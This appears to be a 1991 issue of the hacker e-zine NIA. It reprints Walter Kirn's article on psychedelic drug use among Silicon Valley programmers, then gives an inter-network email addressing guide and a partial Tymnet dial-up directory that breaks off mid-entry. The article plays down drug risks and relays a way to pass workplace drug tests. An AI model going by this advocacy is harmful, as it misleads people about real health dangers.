Founded By: | _ _______ Guardian Of Time | __ N.I.A. _ ___ ___ Are you on any WAN? Are Judge Dredd | ____ ___ ___ ___ ___ you on Bitnet, Internet ------------------+ _____ ___ ___ ___ ___ Compuserve, MCI Mail, \ / ___ ___ ___ ___ ___________ Sprintmail, Applelink, +---------+ ___ ___ ___ ___ ___________ Easynet, MilNet, | 20NOV91 | ___ ______ ___ ___ ___ FidoNet, et al.? | File 73 | ___ _____ ___ ___ ___ If so please drop us a +---------+ ____ _ __ ___ line at / \ ___ _ ___ nia@nuchat.sccsi.com ------------------+ __ Editors: | _ Network Information Access Judge Dredd | Ignorance, There's No Excuse. Lord Macduff | ------------------+ Issue 073 :: Volume 02 "Censorship reflects society's lack of confidence in itself. It is a hallmark of an authoritative regime." - Supreme Court Justice Potter Stewart ============================================================================ 1. NIA073 Index ................................................NIA Editors 2. Valley of the Nerds..........................................Walter Kirn 3. Internet to Anywhere...................................Industrial Phreak 4. Globally Tymnet................................................Hi Fi Del 5. Report on Interexchange Carriers.................................The FCC 6. Vox Populi: NIA News.........................................Judge Dredd 7. Hacking the HP3000 [Part I]...................................Malefactor 8. ** XmasCon '91 Announcement **...............................Santa Claus 9. Editor's Comments............................................NIA Editors ============================================================================ / / / NIA073 / File 02 / / Valley of the Nerds / / by Walter Kirn / / / [Editor's Note: Walter Kirn has written about Spike Lee and John Updike for GQ. He's working in Montana on a new short-story collection.] The keys to our economic future are in the hands of Silicon Valley's young computer visionaries. And a lot of those visions are triggered by hallucinogens created in labs just yesterday. Welcome to the Second Psychedelic Revolution. They call themselves MacAddicts. They are hard-core users of the Apple Macintosh personal computer, and they've come to San Francisco by the tens of thousands for their annual tribal gathering, the Macworld Expo. Some have on suits and carry briefcases. Some have on Grateful Deat T-shirts and carry briefcases. More than a few of them look MacStoned. This is not just another convention; in many ways it's a cybernetic Woodstock, a be-in for the Information Age. Inside the vast Moscone Center, a dizzying sound-and-light show is in progress as corporate exhibitors with names such as Gizmo Technologies, MacroMind and Lifetree push their mind-bending wares, both hard and soft. The conventioneers stand mesmerized before the pulsing VDTs, absorbing each new data rush with giddy nods. A bearded man in an ill-fitting sport coat (he looks as if he wearrs a serape at home and subsists on ogranic trail mix) stares at a screen aswarm with 3-D graphics and grins beatifically. The Mac is beautiful, long live the Mac. Even the Japanese in attendance seem caught up in the digital euphoria. There is no doubt about it: The Apple PC, conceived in a garage by Stevens Jobs and Wozniak, has evolved from a kind of homegrown, countercultural calculator into a multibillion-dollar commercial miracle. But the Macintosh is not the only attraction at the Macworld Expo. On the sidewalk outside the convention hall, a trollish young man with shoulder-length hair and a funky brocade vest is drawing his own adoring audience. Ken Goffman, known to his public by the pen name R.U. Sirius, is the editor of _Mondo 2000_, a rapidly growing desktop-published glossy magazine that documents, among other things, the strange convergence of psychedelic-dru use and avant-garde computer science. Recent articles have included an interview with Timothy Leary on highter computer conscionsness (LSD meets the PC), a rundown of the latest intelligence-boosting pharmaceuticals and a talk with medical scientist John Lilly, the inventor of the sensory-deprivation tank and the trippy pioneer of human/dolphin communication. Today, Goffman has a new issue for sale, and MacAddicts, even the suited, Roledexed ones, are lining up to purchase it (at $5.95 a copy) at an astonishing rate. Possible thinking I'm with _Mondo_, one of the buyers apologizes to me for his Brooks Brothers costume ("My straight clothes") techie friends plan to drop 25D, a mild designer hallucinogen, and check out musician/computer-head Todd Rundgren's Utopia Grokware products. I look at the man's Macworld Expo badge and see that he's an employee of a major San Jose software firm. It doesn't surprise me at all. I've been in California for almost two weeks, deep in the psycho-silicon jungle, and I've met enough of its denizens to know that the "enemy" in the war on drugs includes quite a few of our country's best minds and leading scientific innovators. (Jobs, for example, is a self-confessed former acidhead.) If a massive nationwide raid were held today, it would net mathematicians, inventors, technicians and a multitude of free-lance visionaries--the very people we're counting on to beat out the Japanese, renew a stagnant economy and generally lead us in to the MacFuture. Indeed, this corps of turned-on nerds has already helped to change our lives, providing much of the high-test zeal that has joysticked us from the age of heavy industry into the point-and-click MacPresent of megabytes and mice, shrinking the modern office to the size of a laptop computer and enlarging the laptop computer, via such things as modems and networks, into a walkie-talkie for the global village. So before the crackdown goes any farther, perhaps it's time to ask: Can America afford to take the "high" out of high technology? Arnie Greif is the sort of young man who free-market conservatives applaud in principle but tent to ignore, or even to attack, in practice: a committed, free-thinknig entrepreneur. Along with his wife, Sherri, he operates a business, FractalVision, out of a modest one-story house in a Los Angeles suburb. He keeps a punishing schedule. By day, he toils full-time as a systems analyst for a large electronics corporation, then puts in another forty or fifty hours a week at the Sun workstation computer in his den. Fortunately, the long nocturnal hours are paying off. Unlike most small businesses these days, FractalVision is growing and has doubled income every year since 1987. Basically, what FractalVision produces is digitized hallucinations. Greif pops a tape into his VCR and plays some of the for me. Immediately, the screen is suffused with flowing fields of vibrant imagery. The images are abstract yet familiar, outrageous yet structured--the sort of shapes people often see after taking magic mushrooms. An iridescent snowbank melts away in time-lapse motion. Colonies of Martian microbes fuse and mutate and split apart. The effect on the viewer is slightly disconcerting; you feel as if you're peering into your own brain, watching neutrons fire by the millions. Greif explains that the forms are not random but are visual ranslations of cretain simple equations fed into his computer. This so-called "fractal geometry"--pioneered by Benoit Mandelbrot, an IBM research scientist--governs the behavior of natural phenomena from waterfalls to clouds to brainwaves. This is the new psychedelia, where math and mysticism mix. "On the Fourth of July, 1979," Greif says, "I stared at a blank white wall. I was doing a lot of hallucinogens at the time, and patterns like these are what I saw. Later, I discovered fractal geometry and learned that these shapes are the building blocks of the universe. Now I am able to reproduce these forms mathematically rather than chemically." Arnie goes on to detail the applications of his fractal designs. Some have appeared in music videos--in Cher's _Heart of Stone_, for example. Also, psychotherapists have used his tapes as relaxation aids for their patients. And the principles underlying the designs have implications for acoutic science. Currently, he is working with an engineer to improve studio recording techniques. Eventually, I ask the 30-year-old Grief if he still trips. It seems like an inappropriate question, given the squareness of our surrounding: a living room straight out of the Leviz catalogue, strictly suburban sub-modern. "No, but that doesn't mean I won't go out there again," he says, toying with a strand of shag run. "I've got kids now, so it's hard, it's hard to find the time. I don't really side with the war on drugs, however. Psychedelic drugs are like a chef's knife: dangerous in the wrong hands but useful to the professional." He nods at the video monitor and adds, "I don't think I could have accomplished what I have without them." Among high-tech entrepreneurs, Arnie Greif is not alone in feeling that chemicals and achievement really can mix, all those stern public-service announcements notwithstanding. Ron Lawrence and Vicki Marshall are the founders of a company called KnoWare, a Los Angeles publishing firm and Macintosh consultancy. "Whatever problem you're having with the Mac," Ron boasts, "we're here to solve it. Day or night." Most recently, KnoWare was summoned to troubleshoot the office system of a West Coast fashion magazine. Lawrence, a 45-year-old Vietnam eteran who returned from the war depressed and alienated, credits his personal salvation to three forces: the Macintosh computer, the writings of Timothy Leary (which KnoWare publishes) and psychedelic drugs. "Drugs for me were a catalyst," he says. "By taking sychedelics, you clean out the storage banks and have to reprogram yourself. Thats what I did. And that's what I do with this baby here." He pats his computer as if it were a pet, as if it were part of himself. "Just like with the mind," says Lawrence, "nothing appears on that screen that you don't put there. Psychedelics teach you that." David (not his real name) is a graduate of a top East Coast engieering program. He commutes from his communal house in Berkeley to a computing job at one of America's leading producers of professional video equipment. I interview him in hi home office, where he conducts a sideline business designing custom software packages. On the other side of the office door, at the kitchen table, his housemates are using razor blades to strip the tough green skin off a large San Pedro cactus, hoping to get at the mescaline inside. David's fingers wander lightly over his computer keyboard as he describes the appeal of psychoactive drugs for himself and some of his high-tech peers. his tranquil, cloistered manner reminds me of a friend of mine--an acidhead Ivy League computing major, who, last time I heard from him, was living near Palo Alto doing classified Star Wars research. "If you think about it," says David, "the computer is an alien presence. it takes a lot of courage to relate to such an amazing machine. Drugs help me to overcome my fear of the computer--especially the new drugs. For example, there was the time I used U4ia [a long-acting form of amphetamine] to solve a knotty programming problem. I'd been stuck on this problem for ages, and the drug help to free up my mind enough so I could see it in a while new way." The new drugs David is referring to come in an almost limitless variety. Because the drugs' molecular structures are somewhat malleable and can be changed around faster than the DEA can identify them, some of the newest have yet to made illegal. A number of the substances are designed and manufactured by respectable degree-holding chemists, one of whom is a full professor at a prestigious California university. There is MDMA, or ecstasy, which is said to evoke Aquarian feelings of love and brotherhood. There is ketamine, a potent operating-room anesthetic that I came across maybe a half-dozen times in my Silicon Valley travels. Ketamine, says David, "takes you on a submarine ride ton the bottom of the universe." Then there is DMT, the _Tyrannosaurus rex_ of psychedelics. Usually spoken of by users with a certain wide-eyed, trembling awe, DMT has the power, in the words of one programmer i met," to completely annihilate your ego in about a minute. Your body falls off like a peeled banana skin, and you rocket away in a ray of white light to the edge of known existence." Egoless, bodiless white-light astral travel sounds like pretty scary stuff, and those who have tried DMT readily admit its perils. One mathematics professor I interviewed put it this way: "YOu use the drug three times, and the words 'brain damage' literally appear before your eyes." Indeed, such sober warnings were common among the turned-on techies I encountered. For them, drug use is serious business, requiring meticulous preflight preparations. Prior to takeoff, a typical user fortifies his system with plenty of fruit juice and vitamins, then loads the CD player with congenial music--Bach, perhaps, for thte austerely intellectual; the Red Hot Chili Peppers for the more adventurous. He may even consult an instruction manual, such as the closely typed four-page leaflet that sometimes is provided by hyperresponsible dealers with doses of MDMA ("After an MDMA session, great care must be taken in swallowing solid food, since there is a minimem amount of anesthesia present..."). In the one DMT "experiment" I witnessed, the subject was carefully watched and attended to by a notetaking, water-drinking friends--the psychedelic equivalent of a designated driver. In this world of oddly stringent trippers, where so many genious IQs are on the line, there is little patience for sloppy procedure. The goal is intellectual adventure, not intoxication. Alcohol is widely dismissed as insufficiently insight-inducing. Cigarettes are scarce. Cocaine is charged with promoting aggression and stupidity. The drug-taking is discreet, almost monklike, and, consequently, busts are rare. None of my sources showed any interest in winning converts to higher chemical consciousness, let alone in making money off of drug sales. (Concerned parents will want to note that it doesn't seem likey DMT and ketamine will soon appear on your local playground, despite their popularity at your local high-tech research park.) Readers may logically wonder at this point just how people like David hold on to thier joob, considering the amount of time they spend riding cosmic submarines. What's more, in this age of widespread drug testing, how did they get their job in the first place? The answers to these questions lie in the nonconformist, fairly hallucinogenic nature of the computer industry itself. In a business that seeks to shrink the human mind and put it in a box for easy access, access to one's own mind is not a guilty pleasure but something approaching a duty. R.U. Sirius, whose journalistic rounds put him in constant contact with Siliconites of all descriptions, says, "In my experience, the most creative people in computers experiment with drugs. It's a very bizarre culture, where the freaks are the elite. At a company like Autodesk [a cutting edge developer of virtual-reality technology], the R&D department includes a little room full of people in sandals, with hair down to their ass. At Apple, they buy group tickets to the Grateful Dead show at the end of the year." But what about bad trips? What about those terrifying times when the submarine fails to surface? R.U.'s answer brims with common sense: "People in those fields, if they know what they're doing, seldom freak out. Say that a computer person takes some acid now, in 1991, and everything he sees and hears and feels in speeding by and changing shape. What's the difference between that and his everyday reality?" Chip Krauskopt is the manager of the Human Interface Programat Intel Corporation, the nation's top maker of microprocessors and also a Defense contractor. He corroborates R.U.'s impressions. That Krauskopf is willing--even eager--to speak for attribution underlines Silicon Valley's no-sweat attitude toward chemical recreation. "Some of the people here are very, very, very bright," says Krauskopf. "They were bored in school, and, as a result, they hung out, took drugs and got into computers. A lot of people I know took exactly that path. And remember, this is an industry that grew up in the Sixties, so there was never any stigma against so-called 'hippies.' People at Intel get judged strictly by how good they are. If their skills and arguments are strong, nobody cares if they wear tie-dye and sandals." But what about the urine tests often required by the federal government for suppliers such as Intel? Don't they weed out the heads? Well, no. For one things, urinalysis does not detect most hallucinogens--a fact that led cyberessayist Robert Anton Wilson to predict, in Mondo 2000, "The corporate structure of the short-term future will therefore this our the ranks of pot smokers and coke freaks while the acid heads climb merrily upward in the heirarchy." Furthermore, the tests can pick up only relatively high concentrations of drugs, and Intel's executives virtually see to it that potential employees have an opportunity to clean up their act, at least temporarily, before their pee is screened. "We tell candidates when they first come in for an interview that eventually they will be tested," says Krauskopf. "The levels that are tested at, you see, are such that you have to have taken drugs in the past forty-eight hours. Unless you're a total idiot and do drugs every day, you're going to test clean." If this comes as disturbing news to the straitlaced--the idea that inside the high inside the high-tech core of everything from your office PC to the guidance system of the Patriot missle lurks a psychedelic genie--just consider the alternative. If the drug testing were effective and if it had begun, say, twenty-five years ago, chances are that some of our country's most vital industries might not exist today. Software magnate Mitch Kapor, founder of Lotus Development, whose 1-2-3 spreadsheet forever changed accounting, has publicly credited "recreational chemicals" with helping him form his business outlook. David Bunnell, who started PC Magazine and helped create the Altair, oe of the first personal computers, remembers his co-poineers as looking as if "they were just coming down off a ten-year acid trip." (One of Bunnell's hippie colleagues, Microsoft's Bill Gates, is now one of the country's richest individuals, worth more than $4 billion.) It's time to face fact, America. With our buttoned-down financiers in prison, our uptight bankers in bankruptcy and our automotive titans in retreat, perhaps our freaks are our last, best hope. And it's not that they've been co-opted by the system--they've co-opted it. Yesterday's dropouts, in many cases, are todays insiders, and some of today's head honchos are heads. But what about tommorrow? If you're looking for a prophet of the scientific future, you could do worse than mathematician Ralph Abraham, a shaggy middle-aged professor at the University of California, Santa Cruz, who can use the word "grok" in casual conversation and get away with it. Abraham's revolutionary specialty, in which he is an acknowledged leader, has come to be known as "chaos math" or "dynamical system theory." What people such as Abraham try to do is graph and predict, with the help of computers, seemingly unpredictable events: global climatic change, the rise and fall of financial markets, even the social origins of war. What makes this math revolutionary, of course, is that no one has really mastered it yet, although aficianados believe it can be mastered and that the attempt is eminently worht making. The driving idea behind chaos math--that there is order in randomness and randomness in order--sounds like one of those drug-induced epiphanies you scrawl on a napkin at 3am and then throw away the next day. Well, in a rather literal sense, it is a drug-inspired notion, except that ralph Abraham kept the napkin and has been doodling on it ever since. "In the 1960s," he says, "a lot of people on the frontiers of math experimented with psychedelic substances. There was a brief and extremely creative kiss between the community of hippies and top mathematics. I know this because I was a purveyor of psychedelics to the mathematical community." Math and acid--not, on would think, a natural combination. It's like hearing a champion marathon runner credit his success to chain-smoking Camels. I'm confused. The image of a frying egg ("This is your brain on drugs") flashes in my mind's eye. Abraham explains, "To be creative in mathematics, you have to start from a point of total oblivion. Basically, math is revealed in a totally unconscious process in which one is completely ignorant of the social climate. And mathematical advance has always been the motor behind the advancement of consciousness. What's going on now with dynamical systems theory is at least big a thing as the invention of the wheel." He glances at his desk, at the ubiquitous Macintosh sitting the, with its blind gray screen. "Without this machine, of course," says Abraham, "what we're doing now would not be possible. The computer extends our intellect, which helps us create the future. It offers a door to perceiving complex space-time realities." Abraham explains, "To be creative in mathematics, you have to start from a point of total oblivion. Basically, math is revealed in a totally unconscious process in which one is completely ignorant of the social climate. And mathematical advance has always been the motor behind the advancement of consciousness. What's going on now with dynamical systems theory is at least as big a thing as the invention of the wheel." He glances at his desk, at the ubiquitous Macintosh sitting there, with its blind gray screen. "Without this machine, of course," says Abraham, "what we're doing now would not be possible. The computer extends our intellect, which helps us create the future. It offers a door of perception were cleansed every thing would appear to man as it is, infinite." But what, according to Abraham, will all this infinite portal-cleansing bring? Nothing less, he predicts, than global peace. "Social science, up until now, has not been very scientific. Now, with computers and the new mathematics, we may be able to change that. Soon we may be able to map and manipulate a certain set of parametes--social, cultural, economic, geographical--that will help us to anticipate and mediate international conflict. Loving on the largest possible scale will be enhanced by the intellectual capability to understand the complexity of the systems in which we live." Spoken like a true Macflower child. They are sitting in a darkened Berkeley living room, talking about virtual reality and smoking the milder, powdered form of ketamine. I'm with them but not with them, if you catch my drift. The ketamite is a bit way-out for me, and the conversation too. Because I don't wish these folks legal hassles, I won't say who they are, just that they know a lot about computers (on man runs a thriving electronics research firm) and more than a thing or two about drugs. Their speech, in case you're wondering, as perfectly coherent. Alarmingly coherent, when you consider its content. "You know that telephone-company saving," someone pipes up from the couch, " `Reach out and touch someone'? Well, soon, with the help of virtual reality, you will be able to do that, literally. You'll wear a kind of bodysuit with hundreds of little sensors and vibrators. You'll plug it into your computer, your partner across the country will plug in too, and you'll be able to feel each other up by moving around in the suits. There's a term for it already, `teledildonics.' The phenomenon of long-distance sex." The beautiful young woman sitting beside him--she's a computer musician, and we have just finished listening to her tape--takes a hit of ketamine, then says, "Perfect. No diseases. No unwanted pregnancies." "Here's something else," says another young man. "It's very, very possible that someday we will be able to transfer the contents of our brains straight onto a microchip." "Why?" I ask. "Why wouuld we want to do something like that?" "Come on," he says, "we do it already. We do it all the time, whenever we type our ideas into a compter. In the future, we'll just do it faster, more directly." I concede that, yes, it's a thought. They're all thoughts. Teledildonics, that's a thought too. And as the room fills up with thoughts--Utopian, stange, inspiring, ridiculous--it strikes me that this is precisely what Americans are supposed to do: think freely, then try to apply those thoughts, skeptics and solid citizens be damned. Ford did it, Eddison did it, Jobs and Wozniak did it, Eddison did it, Ralph Abraham is doing it now. It's what we're good at and, coincidentally, what some of our international competitors--with their ancient social rule books and close-order corporate calisthenic sessions--aren't so good at. In his recent book, _More Like Us_, Japan expert James Fallows argued convincingly that instead of trying tto ape Japan's regimented industrial economy, the United States would do better to unleash its individualistic potential. This may be another way of saying that weirdness can be an export commodity. Timothy Leary, who has welcomed the computer revolution with his characteristic cosmic enthusiasm, agrees. While Leary may be a prophet without honor in his own country, the Japanese think otherwise, and he is much in demand there as a lecturer and cultural consultant. "Japan is a tightly structured hive society, and they knokw it," says Leary. "So just as they go the Middle East for oil and Australia for wood, they come to California for creativity. They realize that creativity is a raw resource and that we have an abundance of it here." Part of the recipe for that abundance, like it or not, is chemical. When encountering some bizarre high-tech marvel, we often that we suspect, we're right. And how should we react to this? Is say: as tolerantly and calmly as possible. A little brain damage, in the end, may be a small price to pay for major brainstorms. And it's not as if we could stop these people even if we wanted to. As ever, the pioneers will continue to pioneer, assuming whatever risks they deem necessary. Judge them not by the trips they take but by the gifts they carry back. ============================================================================ / / / NIA073 / File 03 / / Internet 2 Anywhere / / Industrial Phreak / / / In the last issue of Phrack magazine was published the uucp to compuserve gateway material. In light of the recent happenings of Phrack magazine I have decided to write the uucp to anywhere material and send it to NIA. This file will tell you how to recieve and send mail to everywhere reachable from internet. This is meant for those just starting on using the internet and thus the experienced users and dry. --Industrial Phreak Current networks that are connected by a gateway are as follows: applelink AppleLink (Apple Computer, Inc.'s in-house network) attmail AT&T Mail,AT&T's commercial e-mail service. bitnet international academic network bix Byte Information eXchange: Byte magazine's commercial BBS bmug Berkeley Macintosh Users Group compuserve commercial time-sharing service connect Connect Professional Information Network (commercial) easynet Easynet (DEC's in-house mail system) envoy Envoy-100 (Canadian commercial mail service) fax Facsimile document transmission fidonet PC-based BBS network geonet GeoNet Mailbox Systems (commercial) internet the Internet mci MCI's commercial electronic mail service mfenet Magnetic Fusion Energy Network nasamail NASA internal electronic mail peacenet non-profit mail service sinet Schlumberger Information NETwork span Space Physics Analysis Network (includes HEPnet) sprintmail Sprint's commercial mail service (formerly Telemail) thenet Texas Higher Education Network Ok, here goes the rest: I'm at: applelink You're at: internet To mail you i write to "user@domain@internet#" in which the domian can be the form of "site.bitnet" w/the address being less than 35 characters I'm at: AT&T Mail (Herein: attmail) You're at: internet To mail you I write to "internet!domain!user". For any problems contact the AT&T Mail Customer Assistance Center at 1.800.MAIL.672 I'm at: bitnet You're at: internet There are a few ways of doing this depending upon your software. In most cases "user@domain" should work. If this doesn't, try "user%domain@gateway" where "gateway" is a regional Bitnet-Internet gateway site. I'm at: compuserve You're at: fax machine To send you something I simply send (in USA only) "FAX number". If you were at the number +1 512 666 1234 then in the number field I would put "15126661234". Not difficult. I'm at: compuserve You're at: mci If your address at mci was 666-6969 I would put ">MCIMAIL:666-6969". I'm at: connect You're at: internet I would send to CONNECT id "DASNET" and on the first line of the message put "\"user@domain\"@DASNET" I'm at: easynet You're at: bitnet The gateway is DECWRL::ADMIN. Therefore from VMS use NMAIL to send to "nm%DECWRL::\"user@site.bitnet\"". From Unix send to "user@site.bitnet" or if that fails send (via IP) "\"user%site.bitnet\"@decwrl.dec.com" or (via DECNET) send "DECWRL::\"user@site.bitnet\"" I'm at: envoy You're at: internet The gateway is ICS.TEST or ICS.BOARD. Therefore send to "[RFC-822=\"user(a)domain\"]INTERNET/TELEMAIL/US" and for special characters use @=(a) !=(b) _=(u) any=(three octal digits) I'm at: fidonet You're at: internet Just send to "uucp" at the nearest gateway site and in the first line put "To: user@domain" I'm at: geonet You're at: internet I would send to "DASNET" and in the subject line put "user@domain!subject" I'm at: GSFCMail You're at: internet The nearest gateway is cust.svc. Therefore at the "To:" type POSTMAN and at the first line of your message enter "To: user@domain" I'm at: GSFCMail You're at: NASAMAIL The gateway is cust.svc so send to "(C:USA,ADMD:TELEMAIL,P:NASAMAIL,O:NASA,UN:userid)" I'm at: GSFCMail You're at: span (now nsi-decnet) The gateway is cust.svc. At the "To:" type "POSTMAIN" and in the first line of the message type "To: user@host.SPAN.NASA.GOV" or use GSFCCNE gateway and send it to (C:USA,ADMD:TELEMAIL,P:GSFCCNE,O:SPAN,OU:host,SN:user) I'm at: GSFCMail You're at: sprintmail For public networks send it to "(C:USA,ADMD:TELEMAIL,O:organization,UN:userid)" and for private networkds send it to "(C:USA,ADMD:TELEMAIL,PRMD:private_net,O:organization,UH:userid)" I'm at: internet You're at: applelink Just send it to "user@applelink.apple.com" I'm at: internet You're at: attmail Again just send it to "user@attmail.com" I'm at: internet You're at: bitnet I would send it to "user%site.bitnet@gateway" where gateway is the gateway host like cunyvm.cuny.edu or mitvma.mit.edu. I'm at: internet You're at: bix Just send it to "user@dcibix.das.net" I'm at: internet You're at: bmug If your name was Jack Off then I would send it to "Jack.Off@bmug.fidonet.org" I'm at: internet You're at: compuserve If your ID was "76969.666" then I would send it to "76969.666@compuserve.com" I'm at: internet You're at: connect If your NAME was JACK the I'd send it to "JACK@dcjcon.das.net" I'm at: internet You're at: easynet Your field is HOST::USER so I would send it to "user@host.enet.dec.com" or "user%host.enet@decwrl.dec.com". I'm at: internet You're at: easynet Lets say you're Jack Off @CUM, then I would send it to "Jack.Off@CUM.MTSMDEC.COM" I'm at: internet You're at: econet The gateway is so I would send to "user@igc.org". I'm at: internet You're at: envoy I'd send to "att!attmail!mhs!envoy!userid@UUNET.UU.NET" or if that didn't work thru US Sprint's X.400 gateway to "/C=CA/ADMD=TELECOM.CANADA/O=ENVOY/DD.ID=userid/@SPRINT.COM" I'm at: internet You're at: fidonet If you were jack off at 1:2/13:69 then I'd send to "jack.off@p69.f13.n2.z1.fidonet.org" I'm at: internet You're at: geonet I'd send to "user:host@map.das.net". [NOTE: the American host is geo4 and European host is geo1]. I'm at: internet You're at: GSFCMail The gateway is postmaster@ames.arc.nasa.gov so I'd send to "user@GSFCMAIL.NASA.GOV" I'm at: internet You're at: mci You're Jack Off (123-4567) I'd send to "1234567@mcimail.com". I'm at: internet You're at: mfenet Then I'd send to "user%mfenode.mfenet@nmfecc.arpa" I'm at: internet You're at: nasamail The gateway is so I'd send it to "user@nasamail.nasa.gov" I'm at: internet You're at: peacenet The gateway is so I'd send it to "user@igc.org". I'm at: internet You're at: signet (through FidoNet) Ok, you're Jack Off again at 1:2/13:69 send it to Jack.Off@f527.n2.z2.fidonet.org (thats the Fido-SigNet gateway) and in the first line put "@DOMAIN SIGNet 1:2/13:69 FidoNet 2:2/527". [NOTE: The sysop of the gateway can be reached "andreas.levenitschnig@f527.n2.z2.fidonet.org". I'm at: internet You're at: sinet Your fields are node::user or node1::node::user so send to "user@node.SINet.SLB.COM" or "user%node@node1.SINet.SLB.COM" I'm at: internet You're at: span (now nsi-decnet) Your field is host::user and the gateway is netmgr@nssdca.gsfc.nasa.gov so send to "user@host.SPAN.NASA.GOV" I'm at: internet You're at: sprintmail The gateway is postmaster@sprint.com so for public networks send to "/C=US/ADMD=TELEMAIL/O=organization/DD.UN=userid/@SPRINT.COM" or if you know the recipients registered full name "/C=US/ADMD=TELEMAIL/O=organization/PN=firstname.lastname/@SPRINT.COM" for private networks send to "/C=USA/ADMD=TELEMAIL/PRMD=private_net/O=organization/DD.UN=userid/@SPRINT.COM" I'm at: internet You're at: thenet Send to "user%host.decnet@utadnx.cc.utexas.edu" I'm at: internet You're at: uninet (South Africa) (Thru FidoNet) Send the message to user.node@f4.n494.z5.fidonet.org (a list of uninet nodes can be obtained with a SEND UNINODE) I'm at: mci You're at: internet At the "To" prompt type "Jack Off (EMS)" at "EMS:" type "internet" and at the "Mbx:" type "user@domian". I'm at: nasamail You're at: internet At the "To:" prompt type "POSTMAN" and at the "Text:" (i.e. as the first line of your message) enter "To: user@domain". I'm at: sinet You're at: internet Send it to "M_MAILNOW::M_INTERNET::\"user@domain\"" or "M_MAILNOW::M_INTERNET::domain::user" I'm at: span (now nsi-decnet) You're at: GSFCMain The gateway is mssdca::netmgr so send to "AMES::\"user@GSFCMAIL.NASA.GOV"\" I'm at: span You're at: internet The gateway is nssdca::netmgr so send it to "AMES::\"user@domain\"" I'm at: sprintmail You're at: internet The gateway is (c:usa,admd:telemail,o:telenet.tele,fn:technical,sn:support,i:t) so send to "(C:USA,ADMD:TELEMAIl,PRMD:INTERNET,ID:)" I'm at: thenet You're at: internet So you send it to "UTADNX::WINS%" user@domain " Networks not connected American Online, British Telecom Gold, DialCom, Dialog, Easylink, Eurokom, Fidelity Investments, GEnie, GoldNet, HandsNet, Midas Internation HQ, Nifty-Serve, OMNET (thru CMR send mail to OMNET users by "[omnet.user/OMNET]MAIL/USA%TELEMAIL"@Inetermail.ISI.EDU", Paranet, PC-Relay, Prodigy [thank god], PROFS (general), PROFS (IBM), QUICK-COMM, SABRE, Telemail, VNET. For comments on the file I can be found on internet at uk05769@ukpr.uky.edu Ciao! / / / NIA073 / File 04 / / Globally Tymnet [01/02] / / by Hi Fi Del / / / The following countries and their connections with Tymnet I have organized information on. This is in list/table type format. These countries are detailed: Jamaca, Japan, Kuwait, Luxembourg, Malaysia, Mexico, Netherlands and New Zealand. For those of ya' that don't know very much about Tymnet, see one of the numerous files that have been done on the basics. Enjoy! --- JAMAICA --- JAMAICA - ENHANCED GLOBAL CONNECTION SERVICE 1. TYMUSA Gateway Host Number: 5368 2. Node Number: 3676 3. Rates: $10.00/hour and $.50/Kchar 4. Dialup Locations and Numbers: (1.809) 924-9915 300/1200 Bps Bell 212A 5. Trouble Reporting Center: Support (local) phone: (1.809) 921 5312 Hours of Operation: 24hrs Contact: JAMAICA - BASIC GLOBAL CONNECTION SERVICE Jamaica International Telecommunications Ltd. Net. Name: JAMANTEL 15, North Street DNIC: 3380 P.O. Box 138 Kingston, Jamaica Contact: Mr. Rickards (809) 921-5316/922-6063 Telex: (381) 112 OnTyme: INTL.JAMINTELCOMM 1. ACCESS/SPEEDS: Async dial-in/leased speeds: 300-1200 bps Synchronous leased speeds: 2400-9600 bps 2. PROTOCOLS: Async terminal interface, Sync X.25 3. PRICES: All Prices are in Jamaican Dollars. (1 $ U.S. = 5.35 Jam. $) Connect time: $ .75/minute Transmission: $ 2.25/Kchar. 4. COMMENTS: n/a --------------- OPERATIONAL/TECHNICAL INFORMATION ------------------- 1. FIRST LINE CUSTOMER SERVICE/TROUBLE REPORTING: Contact: Trouble Reporting Hours of Operation: 24hrs Phone: (809) 921 5312 Fax: (809) 921 5329 Ontyme: INTL.JAMINTEL 2. SERVICE INFORMATION ADDRESS: 3. TEST ADDRESS: 4. ASYNC ACCESS PROCEDURES: LOGON: TYMNET STYLE "please log in: " 5. TYMUSA AVAILABLE: Yes 6. DEFAULT PAD SETTINGS: 7. ASYNC DIAL-IN ACCESS TELEPHONE NUMBERS: City/Territory Modem/Speed Access Number ----------------------------------------------------------------- Kingston Bell 212A/300-1200bps (809)924-9915 --- JAPAN --- JAPAN (NIS) - ENHANCED GLOBAL CONNECTION 1. TYMUSA Gateway Host Number: 5404 2. Dialup Node(s): TYM2 Gateway Node(s): 222 3. Rates: $11.40/Hour $0.30/Kilocharacter 4. Dialup Locations and Numbers: City V.21/300bps V.22/1200bps V.22 1200/2400bps -------- ----------- ------------ --------------- Akita 0188-65-5735 0188-65-5733 Atsugi 0462-21-5331 0462-21-0404 Chiba 0472-27-0671 0472-27-0601 Fukui 0776-34-3308 0776-35-8840 Fukuoka 092-474-7076 092-474-7196 Hamamatsu 0534-56-7355 0534-56-7231 Hiroshima 082-241-6857 082-243-9270 Kagoshima 0992-22-8598 0992-22-8954 Kanazawa 0762-24-2351 0762-24-2341 Kobe 078-242-1097 078-242-1115 Kouriyama 0249-38-5396 Kumamoto 096-355-5233 096-354-3065 Kyoto 075-431-6205 075-431-6203 Matsuyama 0899-32-2975 0899-32-4207 Mito 0292-24-1675 0292-24-4213 Morioka 0196-54-8513 0196-54-7315 Nagasaki 0958-28-6088 0958-28-6077 Nagoya 052-911-1621 052-981-3221 Naha 0988-61-4002 0988-61-3414 Niigata 025-241-5409 025-241-5410 Nogano 0262-34-3900 Ohita 0975-38-2160 Okayama 0862-32-6760 0862-31-4993 Osaka 06-271-9028 06-271-9029 06-271-6876 Sendai 022-231-5741 022-231-5355 Sapporo 022-231-5741 022-231-5355 Shizuoka 0542-84-3393 0542-84-3398 Takamatsu 0878-23-0502 0878-23-0501 Takasaki 0273-23-9739 Tokuyama 0834-32-0991 Tokyo 03-555-9525 03-555-9526 03-555-9696 Toyama 0764-41-7578 0764-41-7769 Tsuchiura 0298-55-6123 0298-55-6121 Tuchiura 0298-55-5082 0298-55-6121 Urawa 048-833-9341 Utsunomiya 0286-34-8251 Yokohama 045-453-7757 045-453-7637 Yonago 0859-32-3201 5. Trouble Reporting Center: Support (local) Phone: (011.81.3)-551-6220 Hours of Operation: 24hrs/day, 7days/week. Contact: Network Control Center 6. Comments: Domestic Username has to be valid with access from Class 17. JAPAN - BASIC GLOBAL CONNECTION SERVICE SERVICE OFFERINGS: 4406/NISnet (National & International) Network Information Service Co. (Tymnet Japan) Net. Name: NISNET Marketing and Sales Division DNIC: 4406 1-13-5 Kudanshita Chiyoda-Ku Tokyo, Japan 102 Contact: Mr. Toshi Murakami Tel :(81.3)-262-8711 Fax 